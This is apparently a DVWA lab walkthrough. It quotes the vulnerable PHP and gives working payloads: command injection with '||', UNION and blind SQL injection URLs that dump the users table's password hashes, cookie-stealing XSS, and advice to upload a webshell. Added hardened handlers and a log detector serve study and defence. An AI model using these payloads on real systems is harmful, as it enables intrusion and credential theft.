Brute Force (暴力破解)

Simple: see section "# 0x01 Burt Force (brute-force vulnerability)" of the pikachu walkthrough.

Command Injection

```php
<?php
if ( isset( $_POST[ 'Submit' ] ) ) {
    // Get input (note: $_REQUEST, so GET parameters are accepted as well)
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if ( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping -c 4 ' . $target );
    }

    // Feedback for the end user (raw command output, unencoded)
    echo "<pre>{$cmd}</pre>";
}
?>
```

From the source we can see that the user supplies the argument of a ping command, which is then executed as a system command; depending on whether the server is Windows NT, a different ping test is run against the target IP. The input is concatenated into the command line without any validation.

Input `8.142.189.231 || ipconfig`; the result is as follows:
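A hardened version of the handler above, added here as an example (not DVWA's own code): the target is validated as a literal IP address and shell-quoted, so `||` and other metacharacters are never interpreted. It reads the IP from `$_POST` rather than `$_REQUEST`, and `build_ping_command()` is an assumed helper name.

```php
<?php
// Added example, not DVWA's code. The low-level handler passes
// $_REQUEST['ip'] straight to shell_exec(), so "8.142.189.231 || ipconfig"
// runs a second command. Validate first, then quote: two independent layers.

function build_ping_command(string $target): ?string {
    // Accept only something that parses as an IPv4 or IPv6 address.
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // Quote anyway: if the check above is ever relaxed, the shell still
    // sees a single argument rather than a command separator.
    $arg = escapeshellarg($target);
    if (stristr(php_uname('s'), 'Windows NT')) {
        return 'ping ' . $arg;
    }
    return 'ping -c 4 ' . $arg;
}

if (isset($_POST['Submit'])) {
    $cmd = build_ping_command((string)($_POST['ip'] ?? ''));
    if ($cmd === null) {
        http_response_code(400);
        echo '<pre>Invalid IP address.</pre>';
    } else {
        $out = shell_exec($cmd);
        // Encode the output: ping replies from a hostile resolver must not
        // become HTML in the response.
        echo '<pre>' . htmlspecialchars((string)$out, ENT_QUOTES, 'UTF-8') . '</pre>';
    }
}
```

The validation deliberately rejects hostnames; if name resolution is required, validate against a hostname pattern and still pass the value through `escapeshellarg()`.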
CSRF

Observe the URL:

```
http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=%E6%94%B9%E5%8F%98#
```

View the source:

```php
<?php
if ( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if ( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
```

From the source we can see that there are no protections at all: no anti-CSRF token, no CAPTCHA, nothing. The password change is accepted from a plain GET request, so the security level is low. It is enough to send the link to a logged-in user and have them click it; the attack is then complete.
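The standard fix, added here as an example and not DVWA's own code: require POST and a per-session secret token that a third-party page cannot read. `csrf_token()`, `csrf_check()` and `update_password()` are assumed helper names; `dvwaCurrentUser()` and `$GLOBALS['___mysqli_ston']` are taken from the page's code, and the `users.password` column is assumed wide enough for a `password_hash()` string.

```php
<?php
// Added example, not DVWA's code. A link alone can no longer change the
// password: the request must be a POST carrying the session's token.
session_start();

function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));  // CSPRNG, 256 bits
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(?string $submitted): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals() is constant-time and does not type-juggle like ==.
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

function update_password(mysqli $db, string $user, string $hash): bool {
    // Parameterised UPDATE instead of concatenating into the SQL string.
    $stmt = $db->prepare('UPDATE `users` SET password = ? WHERE user = ?');
    $stmt->bind_param('ss', $hash, $user);
    return $stmt->execute();
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['Change'])) {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('<pre>Invalid CSRF token.</pre>');
    }
    $pass_new  = (string)($_POST['password_new'] ?? '');
    $pass_conf = (string)($_POST['password_conf'] ?? '');
    if ($pass_new === '' || $pass_new !== $pass_conf) {
        exit('<pre>Passwords did not match.</pre>');
    }
    // password_hash() replaces the unsalted md5() of the original.
    $ok = update_password($GLOBALS['___mysqli_ston'], dvwaCurrentUser(),
                          password_hash($pass_new, PASSWORD_DEFAULT));
    exit($ok ? '<pre>Password Changed.</pre>' : '<pre>Update failed.</pre>');
}
?>
<form method="post">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  New: <input type="password" name="password_new">
  Confirm: <input type="password" name="password_conf">
  <input type="submit" name="Change" value="Change">
</form>
```

Marking the session cookie `SameSite=Lax` or `Strict` adds a second, browser-enforced layer, but the token check is what makes the endpoint safe on browsers that ignore the attribute.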
File Inclusion

```php
<?php
// The page we wish to display, taken straight from the query string
$file = $_GET[ 'page' ];
?>
```

From the picture above we can see that this vulnerability allows file inclusion exploitation: local file inclusion to read local information, and remote file inclusion to include a shell.

I don't know why a relative path doesn't work? I tried remote file inclusion and it did not succeed; setting environment issues aside, it should be a remote file inclusion.

Remediation:

1. Disable remote file inclusion: allow_url_include=off
2. Set open_basedir=<directory> to restrict the accessible area.
3. Filter ../ and other special characters.
4. Change the storage location of the Apache log files.
5. Enable magic quotes: magic_quotes_gpc=on
6. Avoid calling files through dynamic variables; write the file to be included directly.
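Item 6 of the remediation list in working form, added here as an example and not DVWA's own code: the request is resolved against a fixed allow-list and the resulting path is checked to lie under the page directory, so neither `../` nor a URL reaches `include`. `PAGE_DIR`, `ALLOWED_PAGES` and `resolve_page()` are assumed names; the page names are DVWA's, the directory layout is assumed.

```php
<?php
// Added example, not DVWA's code. include($_GET['page']) trusts the path;
// here the client only chooses a key, and the server maps it to a file.

const PAGE_DIR      = __DIR__ . '/pages/';                  // assumed location
const ALLOWED_PAGES = ['include', 'file1', 'file2', 'file3']; // DVWA's page names

function resolve_page(string $requested): ?string {
    // Bare identifier only: no slashes, dots, schemes or null bytes, and it
    // must be one of the known pages.
    if (!preg_match('/^[a-z0-9_]+$/i', $requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . $requested . '.php');
    // realpath() collapses symlinks and ../; confirm the result is still
    // inside the page directory (belt and braces, given the allow-list).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page((string)($_GET['page'] ?? 'include'));
if ($file === null) {
    http_response_code(404);
    exit('<pre>Unknown page.</pre>');
}
include $file;
```

With this in place, `allow_url_include=Off` and `open_basedir` (items 1 and 2) remain worthwhile as configuration-level backstops.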
File Upload

```php
<?php
if ( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    // The client-supplied filename is used as-is
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if ( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} successfully uploaded!</pre>";
    }
}
?>
```

No filtering of any kind is applied to the uploaded file, so a PHP file can be uploaded directly; put a one-line webshell in it and connect with a tool such as Caidao (菜刀) or AntSword (蚁剑). Alternatively, generate the PHP file with Metasploit and connect to it!!!
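A hardened upload handler, added here as an example and not DVWA's own code: the file must sniff as an image, the extension is chosen by the server from the detected type, and the stored name is random so the client's filename never touches the filesystem. `validate_image_upload()` and the 100 kB limit are assumptions; `DVWA_WEB_PAGE_TO_ROOT` is from the page's code.

```php
<?php
// Added example, not DVWA's code. The original stores whatever name and
// bytes the client sends, so shell.php lands under the web root.

function validate_image_upload(array $file): ?array {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] > 100000) {                 // 100 kB limit (assumed)
        return null;
    }
    // Decide the type from content, not from $_FILES['uploaded']['type'] or
    // the client-supplied extension, both of which the client controls.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = (string)$finfo->file($file['tmp_name']);
    $ext   = ['image/jpeg' => 'jpg', 'image/png' => 'png'][$mime] ?? null;
    if ($ext === null || getimagesize($file['tmp_name']) === false) {
        return null;
    }
    return ['ext' => $ext, 'mime' => $mime];
}

if (isset($_POST['Upload'])) {
    $info = validate_image_upload($_FILES['uploaded'] ?? []);
    if ($info === null) {
        echo '<pre>Your image was not uploaded.</pre>';
    } else {
        // Server-chosen random name with a server-chosen extension.
        $name        = bin2hex(random_bytes(16)) . '.' . $info['ext'];
        $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/' . $name;
        if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . ' successfully uploaded!</pre>';
        } else {
            echo '<pre>Your image was not uploaded.</pre>';
        }
    }
}
```

Independently of this check, the uploads directory should be served with script execution disabled (no PHP handler for that path), so that even a validation bypass yields a static file rather than code execution.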
Insecure CAPTCHA
SQL Injection

```php
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                // The copy of this code on the page referenced an undefined $sqlite_db here;
                // the connection handle in scope is $sqlite_db_connection.
                echo "Error in fetch ".$sqlite_db_connection->lastErrorMsg();
            }
            break;
    }
}
?>
```

Code analysis: the parameter arrives via GET and is concatenated on the back end into `"SELECT first_name, last_name FROM users WHERE user_id = '$id';"`, which is then executed as-is.

```
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' and '1'='1&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' and '1'='2&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 5--+&Submit=Submit#

Determine the number of columns:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20order%20by%202--+&Submit=Submit#

Query the operating system and version:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=0%27%20union%20select%201,2--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2%27%20union%20select%20database(),version()%20--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2%27%20union%20select%20@@version_compile_os,version()%20--+&Submit=Submit#
```

Result: database name dvwa, version 5.5.53, operating system Win32.
Query the names of all databases:

```
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(schema_name),1 from information_schema.schemata --+&Submit=Submit#
```

Query all tables in the dvwa database:

```
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(table_name),1 from information_schema.tables where table_schema=database() --+&Submit=Submit#
```

Or:

```
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(table_name),1 from information_schema.tables where table_schema='dvwa' --+&Submit=Submit#
```

Query all column names of the users table:

```
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(column_name),1 from information_schema.columns where table_name='users' --+&Submit=Submit#
```

Query all column values of the users table:

```
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(user_id,0x3a,user,0x2c,password,0x3b),1 from users --+&Submit=Submit#
```
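The fix for both this page and the blind variant that follows, added here as an example and not DVWA's own code: a prepared statement sends the SQL and the value separately, so `' and '1'='1` or `union select ...` is compared as a literal `user_id` rather than parsed as SQL. `lookup_user()` is an assumed name; `$GLOBALS['___mysqli_ston']` is DVWA's connection handle from the page's code, and `get_result()` assumes the mysqlnd driver.

```php
<?php
// Added example, not DVWA's code. Replaces the string-built query of the
// low-level sqli and sqli_blind handlers with a parameterised one.

function lookup_user(mysqli $db, string $id): array {
    // user_id is an integer column: reject anything else before touching the DB.
    if (!ctype_digit($id)) {
        return [];
    }
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = ?');
    $stmt->bind_param('i', $id);          // bound as an integer parameter
    $stmt->execute();
    $result = $stmt->get_result();
    $rows = [];
    while ($row = $result->fetch_assoc()) {
        $rows[] = $row;
    }
    $stmt->close();
    return $rows;
}

if (isset($_REQUEST['Submit'])) {
    $id = (string)($_REQUEST['id'] ?? '');
    $db = $GLOBALS['___mysqli_ston'];
    $rows = lookup_user($db, $id);
    if ($rows === []) {
        // Same response for "no such user" and "rejected input": nothing for
        // a boolean-blind probe to distinguish.
        echo '<pre>No results.</pre>';
    }
    foreach ($rows as $row) {
        // Encode on output as well: the echo in the original reflects $id unescaped.
        echo '<pre>ID: ' . htmlspecialchars($id, ENT_QUOTES, 'UTF-8')
           . '<br />First name: ' . htmlspecialchars($row['first_name'], ENT_QUOTES, 'UTF-8')
           . '<br />Surname: ' . htmlspecialchars($row['last_name'], ENT_QUOTES, 'UTF-8')
           . '</pre>';
    }
}
```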
SQL Injection (Blind)

Determine whether the parameter is numeric or string type:

```
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1 and 1=3&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20%271%27=%273&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20%271%27=%271&Submit=Submit#
```

Conclusion: the parameter is string type, injectable with a single quote.

Test the length of the database name:

```
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())%3E5%20--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())=4%20--+&Submit=Submit#
```
| Input statement | Displayed result |
|---|---|
| `1' and ascii(substr(database(),1,1))>97#` | Exists: the first character is a lowercase letter other than a. |
| `1' and ascii(substr(database(),1,1))=100#` | Exists: the first character is d. |
| `1' and ascii(substr(database(),2,1))=118#` | Exists: the second character is v. |
| `1' and ascii(substr(database(),3,1))=119#` | Exists: the third character is w. |
| `1' and ascii(substr(database(),4,1))=97#` | Exists: the fourth character is a. |

| Input statement | Displayed result |
|---|---|
| `1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10#` | Does not exist. |
| `1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>8#` | Exists: the first table in dvwa has a name of length 9. |
| `1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9#` | Exists: verified. |

The length of the second table can be guessed the same way:

| Input statement | Displayed result |
|---|---|
| `1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=5#` | Exists: the second table in dvwa has a name of length 5. |
Ah! Anyway, you just keep trying; the method is as shown above. I wrote up the complete blind-injection process in another blog post (click to jump).

XSS (DOM)

```
127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E
```

XSS (Reflected)

```
127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>#
```

XSS (Stored)
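From the defender's side, the character-by-character guessing above has a distinctive footprint: a long run of requests to `sqli_blind` from one client, differing only in the probed position and comparison value. The following is an added example, not part of the original post, that scans web-server access-log lines for that footprint; the log lines are constructed samples, and `blind_probe_counts()` and the threshold are assumed.

```php
<?php
// Added example, not DVWA's code. Flags clients whose decoded query strings
// match the boolean-blind probes used in the tables above.

// Constructed sample in common log format (not real traffic).
const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),1,1))%3E97%23&Submit=Submit HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),1,1))=100%23&Submit=Submit HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())=4%20--+&Submit=Submit HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 498
LOG;

// Fingerprints of the probe shapes seen on this page: ascii(substr(...)) and
// length(database()) / length((select ...)).
const BLIND_PATTERNS = [
    '/\bascii\s*\(\s*substr\s*\(/i',
    '/\blength\s*\(\s*(database|\(\s*select)\b/i',
];

function blind_probe_counts(string $log, int $threshold = 2): array {
    $counts = [];
    foreach (explode("\n", trim($log)) as $line) {
        // Client IP is the first field; the request target follows the method.
        if (!preg_match('/^(\S+) .*?"(?:GET|POST) (\S+)/', $line, $m)) {
            continue;
        }
        $ip  = $m[1];
        $url = urldecode($m[2]);   // match on the decoded form: %27 -> ', + -> space
        foreach (BLIND_PATTERNS as $re) {
            if (preg_match($re, $url)) {
                $counts[$ip] = ($counts[$ip] ?? 0) + 1;
                break;
            }
        }
    }
    // A single hit may be a scanner or noise; a run of them is enumeration.
    return array_filter($counts, fn(int $n): bool => $n >= $threshold);
}

print_r(blind_probe_counts(SAMPLE_LOG));
```

In production the same matching belongs in a WAF rule or a log pipeline keyed on client, URL and a time window; the threshold and patterns here are a starting point, not a tuned signature.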